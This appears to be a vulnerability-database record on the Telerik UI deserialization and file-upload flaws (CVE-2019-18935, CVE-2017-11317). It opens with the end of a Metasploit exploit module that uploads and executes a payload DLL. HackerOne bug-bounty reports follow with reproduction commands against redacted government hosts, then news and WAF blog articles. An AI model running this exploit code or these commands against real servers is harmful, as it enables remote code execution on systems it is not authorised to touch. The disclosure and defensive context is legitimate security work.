CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document['metaData']).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(\"#{encrypt(serialized_object.to_json.encode('UTF-16LE'))}&#{encrypt(serialized_object_type.encode('UTF-16LE'))}\", nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/telerik_rau_deserialization.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2020-08-13T18:53:44", "bounty": 0.0, "description": "**Summary:**\nThe website at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.\n\n## Step-by-step Reproduction Instructions\n\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau. You will see the following message confirming that the file upload handler is registered:\n`{ \"message\" : \"RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly.\" }`\n2. From here on out I used the write-up at https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui for reference.\n3. With a slight modification to the script in the BishopFox write-up, I was able to determine the software version:\n\n```\necho 'test' > testfile.txt\nfor VERSION in $(cat versions.txt); do\n echo -n \"$VERSION: \"\n python3 RAU_crypto.py -P 'C:\\Windows\\Temp' \"$VERSION\" testfile.txt https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo\n done\n```\nThe `versions.txt` file I used has been attached to this report for ease of replication.\n4. As shown in the results, the version is vulnerable to CVE-2017-11317 and I was able to successfully upload the `testfile.txt`.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n5. Next, on a Windows system with Visual Studio installed, compile a dll using `build_dll.bat` as shown in the BishopFox article.\n6. Using `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607 -f 'C:\\Windows\\Temp' -p <your_created_dll>.dll`, if you compiled using the PoC in the article you should be able to make the server hang for around 10 seconds. \n7. Once the sleep is over, the server should respond with a similar message as follows: `[*] Response time: 12.34 seconds` showing the server is vulnerable to CVE-2019-18935.\n8. At this point you can upload a reverse shell payload, but I feel the sleep PoC is good enough to prove RCE.\n\n## Product, Version, and Configuration (If applicable)\nTelerik UI 2016.2.607\n\n## References\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\nhttps://github.com/bao7uo/RAU_crypto\nhttps://github.com/noperator/CVE-2019-18935\nhttps://hackerone.com/reports/838196\n\n## Suggested Mitigation/Remediation Actions\nFollow recommended fix actions at https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n\n## Impact\n\nRemote Code Execution/Total system compromise.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-02T08:13:07", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via CVE-2019-18935", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-08-13T18:11:22", "id": "H1:913695", "href": "https://hackerone.com/reports/913695", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T17:56:52", "bounty": 0.0, "description": "Hello,\nI found an outdated version of Telerik Web UI (v2016.2.607.40) at the following URL: https://\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau.\nThis means that we can achieve full RCE by chaining two different CVEs: CVE-2017-11317, which allows us to upload arbitrary files on the server, and CVE-2019-18935, which is a deserialization vulnerability.\n\nFirst of all, the only thing that I tried to prove that I had successfully achieved code execution was making the server sleep for 10 seconds.\nNo data was compromised.\n\nSteps to reproduce\n---------------------\nThe steps that I followed are thoroughly described in this blog post: <https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>.\nHere's a quick summary:\n- Download the files in the attachments\n- Make sure you have pycryptodome installed (pip3 install pycryptodome)\n- Run the following command: `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607.40 -f 'C:\\Windows\\Temp' -p sleep_042020163752,45_amd64.dll`\n- The `sleep_042020160430,40_amd64.dll` is supposed to Sleep(10). This will make the server hang for roughly ten seconds, and after that you will get a response like this one: `[*] Response time: 12.88 seconds`\n- The exploit worked.\n\nThings to note\n---------------------\nI had to edit the original exploit code provided in the aforementioned blog post (https://github.com/noperator/CVE-2019-18935) because I noticed that when uploading the .dll file the server added a .tmp at the end of the file name.\nThat's why the original code was failing to exploit the deserialization part.\nI added `+ '.tmp'` at the end of line 95 and after that it worked just fine.\n\nA DLL file can only work once. This means that to test the vulnerability again a new DLL has to be compiled.\nFor this reason I provided several DLLs in the attachments so you don't have to compile them (especially because a windows machine with Visual Studio installed is required).\n\nI didn't upload a reverse shell because I thought it was not a great idea, but if needed I could do it.\n\nHow to fix\n---------------------\nJust upgrade Telerik for ASP.NET AJAX to R3 2019 SP1 (v2019.3.1023) or later.\n\n## Impact\n\nFull **Remote Code Execution** on the vulnerable server.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-03T14:48:45", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI ", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-05-07T16:54:15", "id": "H1:838196", "href": "https://hackerone.com/reports/838196", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:17", "description": "[![APT Hacking Group](https://thehackernews.com/images/-aPh3AyK7bqc/YQfQByUmHnI/AAAAAAAADaU/NmwrUQl8ZRcRsgL1Y2FPj8U64wKdrMlLACLcBGAsYHQ/s728-e1000/apt-hacker.jpg)](<https://thehackernews.com/images/-aPh3AyK7bqc/YQfQByUmHnI/AAAAAAAADaU/NmwrUQl8ZRcRsgL1Y2FPj8U64wKdrMlLACLcBGAsYHQ/s0/apt-hacker.jpg>)\n\nA new highly capable and persistent threat actor has been targeting major high-profile public and private entities in the U.S. as part of a series of targeted cyber intrusion attacks by exploiting internet-facing Microsoft Internet Information Services ([IIS](<https://en.wikipedia.org/wiki/Internet_Information_Services>)) servers to infiltrate their networks.\n\nIsraeli cybersecurity firm Sygnia, which identified the campaign, is tracking the advanced, stealthy adversary under the moniker \"Praying Mantis\" or \"TG2021.\"\n\n\"TG1021 uses a custom-made malware framework, built around a common core, tailor-made for IIS servers. The toolset is completely volatile, reflectively loaded into an affected machine's memory and leaves little-to-no trace on infected targets,\" the researchers [said](<https://www.sygnia.co/praying-mantis-targeted-apt>). \"The threat actor also uses an additional stealthy backdoor and several post-exploitations modules to perform network reconnaissance, elevate privileges, and move laterally within networks.\" \n\n[![APT Hacking Group](https://thehackernews.com/images/-ZP-P4VwOZxI/YQfQWTuCuiI/AAAAAAAADac/u-zO1cQst2UuJ9lV7I9J_dj369CMBpmhgCLcBGAsYHQ/s728-e1000/hacker-attack.jpg)](<https://thehackernews.com/images/-ZP-P4VwOZxI/YQfQWTuCuiI/AAAAAAAADac/u-zO1cQst2UuJ9lV7I9J_dj369CMBpmhgCLcBGAsYHQ/s0/hacker-attack.jpg>)\n\nBesides exhibiting capabilities that show a significant effort to avoid detection by actively interfering with logging mechanisms and successfully evading commercial endpoint detection and response (EDR) systems, the threat actor has been known to leverage an arsenal of ASP.NET web application exploits to gain an initial foothold and backdoor the servers by executing a sophisticated implant named \"NodeIISWeb\" that's designed to load custom DLLs as well as intercept and handle HTTP requests received by the server.\n\n[![APT Hacking Group](https://thehackernews.com/images/-50djfDO2Prg/YQfQlpOifCI/AAAAAAAADag/Zr7kLjdvhak0dndsJENUEv_mJYyfng4hwCLcBGAsYHQ/s728-e1000/hacking-news.jpg)](<https://thehackernews.com/images/-50djfDO2Prg/YQfQlpOifCI/AAAAAAAADag/Zr7kLjdvhak0dndsJENUEv_mJYyfng4hwCLcBGAsYHQ/s0/hacking-news.jpg>)\n\nThe vulnerabilities that are taken advantage of by the actor include:\n\n * Checkbox Survey RCE Exploit ([CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>))\n * VIEWSTATE Deserialization Exploit\n * Altserialization Insecure Deserialization\n * Telerik-UI Exploit ([CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) and [CVE-2017-11317](<https://nvd.nist.gov/vuln/detail/CVE-2017-11317>))\n\nInterestingly, Sygnia's investigation into TG1021's tactics, techniques, and procedures (TTPs) have unearthed \"major overlaps\" to those of a nation-sponsored actor named \"[Copy-Paste Compromises](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>),\" as detailed in an advisory released by the Australian Cyber Security Centre (ACSC) in June 2020, which described a cyber campaign targeting public-facing infrastructure primarily through the use of unpatched flaws in Telerik UI and IIS servers. However, a formal attribution is yet to be made.\n\n\"Praying Mantis, which has been observed targeting high-profile public and private entities in two major Western markets, exemplifies a growing trend of cyber criminals using sophisticated, nation-state attack methods to target commercial organizations,\" the researchers said. \"Continuous forensics activities and timely incident response are essential to identifying and effectively defending networks from attacks by similar threat actors.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T11:11:00", "type": "thn", "title": "New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2021-27852"], "modified": "2022-02-23T04:34:16", "id": "THN:942BFBB34DF6A24E460572684F648005", "href": "https://thehackernews.com/2021/08/new-apt-hacking-group-targets-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[![Security Vulnerabilities](https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s728-e1000/Security-Vulnerabilities.jpg)](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2020-08-07T08:03:43", "description": "On June 18, 2020, the Australian Cyber Security Centre (ACSC) released a disclosure detailing a \u2018sophisticated\u2019 and sustained attack against Australian government bodies and companies. The disclosure was covered by several mainstream media outlets including the [BBC](<https://www.bbc.com/news/world-australia-46096768>), and the [Guardian](<https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison>).\n\nThe following day, the Australian prime minister made a [statement](<https://www.pm.gov.au/media/statement-malicious-cyber-activity-against-australian-networks>) about the attacks in which, although he declined to attribute the attacks to a specific threat actor, he suggested that it was \u2018state based\u2019. According to the BBC the prime minister also stressed that the attacks were not limited only to Australia, but affected targets worldwide.\n\nSeveral exploits and indicators of compromise were outlined in the ACSC\u2019s disclosure, including initial access vectors, execution techniques, malware, and persistence techniques. These were all evaluated by our analysts to ensure that, where possible, the Imperva Cloud WAF could mitigate attempts to utilise such vectors. Naturally, some of these items fall outside of the scope of what a WAF is expected to mitigate, such as spear phishing attacks. However, in many instances, the wide-ranging capabilities of Imperva Cloud WAF allows for effective mitigation of the exploits and techniques leveraged in the campaign. In this blog post, we\u2019ll explore some of these exploits and techniques and how Imperva Cloud WAF can mitigate against them.\n\n### The Access Vectors\n\nThe ACSC identified several initial access vectors during the campaign, all of which are detailed [here](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>). Let\u2019s take a brief look at a few of these vectors, and the mitigation provided by the Imperva Cloud WAF.\n\n### Telerik UI CVE-2019-18935\n\nCVE-2019-18935 is a vulnerability discovered in 2019 by researchers at [Bishop Fox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>), in the RadAsyncUpload file handler in Telerik UI for ASP.net AJAX, a commonly-used suite of web application UI components. The vulnerability is brought about by the [insecure deserialization](<https://www.imperva.com/blog/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>) of JSON objects, which can lead to remote code execution on the host.\n\nIn order to successfully exploit the insecure deserialization vulnerability identified in CVE-2019-18935, the attacker must also exploit a pre-existing file upload vulnerability, CVE-2017-11317, which identifies the use of a default encryption key to encrypt the data in file upload requests. With this knowledge, an attacker can use the key to modify the \u201cTempTargetFolder\u201d variable in the upload request, essentially allowing 